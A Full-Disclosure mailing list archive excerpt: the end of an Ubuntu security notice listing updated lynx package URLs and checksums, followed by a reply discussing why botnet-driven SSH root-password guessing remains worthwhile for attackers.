630 29b531cd83fefaa675123c6ec002bec2 http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5.orig.tar.gz Size/MD5: 2984352 5f516a10596bd52c677f9bfd9579bc28 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04.1_amd64.deb Size/MD5: 1881920 543df451db2a2dc94913abddafe4503e i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04.1_i386.deb Size/MD5: 1832034 e5ac9c24ae2f86ccb8576227824fb975 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.04.1_powerpc.deb Size/MD5: 1878454 fb5337e70bf1d3d554976c171a4ff895 Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10.1.diff.gz Size/MD5:18058 c3ebb84869db50e98ee63da53190 http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10.1.dsc Size/MD5: 630 25d773746e771160b7599970153b3c07 http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5.orig.tar.gz Size/MD5: 2984352 5f516a10596bd52c677f9bfd9579bc28 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10.1_amd64.deb Size/MD5: 1901272 5d15ae7d8b51875cd867864b47d5d2d5 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10.1_i386.deb Size/MD5: 1833236 37e7437cbb088ddd91aa8a2cfae42625 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/l/lynx/lynx_2.8.5-2ubuntu0.5.10.1_powerpc.deb Size/MD5: 1880942 78a7f90f4414e73c289d1d9756ed1dc7 signature.asc Description: Digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Brain dead SSH scans from Italy
Etaoin Shrdlu wrote: snip Thanks to whomever finally got through, however you did it. I had actually allowed one host to start responding, and it had gotten to the part I always least understand, i.e. the tries for root's password. I mean, really, are there that many hosts out there with root accounts that can be guessed with an automated password guesser? ... Define that many... It's not about the total number -- it's simply about the fact that there really are some, and we know that here some == quite a few more than one. Better to think of it in terms of a proportion though, then allow that the law of large numbers kicks in _on both the attackers' and victims' sides of the equation_. If the potential attackers can run their probes from a botnet then they reduce their own workload significantly are not even risking discovery or any real loss if they tracked/shut-down as it is all but guaranteed that all they will lose is a bot or two in the odd case where someone will care enough to try to track down the attacker. And if the available victims are, say 0.00015% of all machines, scanning a few million machines gets you plenty more new victims. And that's not even considering that some machines may be more worthwhile cracking than others... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/